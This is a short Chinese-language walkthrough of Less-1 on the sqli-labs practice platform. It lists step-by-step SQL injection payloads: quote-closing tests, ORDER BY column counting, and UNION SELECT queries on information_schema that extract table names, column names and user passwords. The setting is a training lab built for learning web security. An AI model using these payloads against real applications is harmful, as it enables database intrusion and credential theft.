sqli-labs 是专门用于sql注入练习的平台,该平台包含常见的注入类型,环境共有65个 SOL 注入漏洞,旨在帮助Web安全学习者对SQL注入漏洞有一个全面的了解,对待入门小白的学习十分有用。
话不多说直接开注!!!
——————————————————分割线————————————————————
Less-1
输入?id=1 正常
输入?id=1' 报错
输入?id=1'--+ 正常判断是字符型注入,闭合方式是'
?id=1' order by 3--+ 正常
判断回显位有三个。
?id=-1' union select 1,group_concat(table_name),database() from information_schema.tables where table_schema='security'--+ 联合注入
查出表名emails,referers,uagents,users
?id=-1' union select 1,group_concat(column_name),database() from information_schema.columns where table_schema='security' and table_name='users'--+
查出列名
?id=-1' union select 1,group_concat(username,'~',password),database() from users--+
查出对应用户账户密码用~链接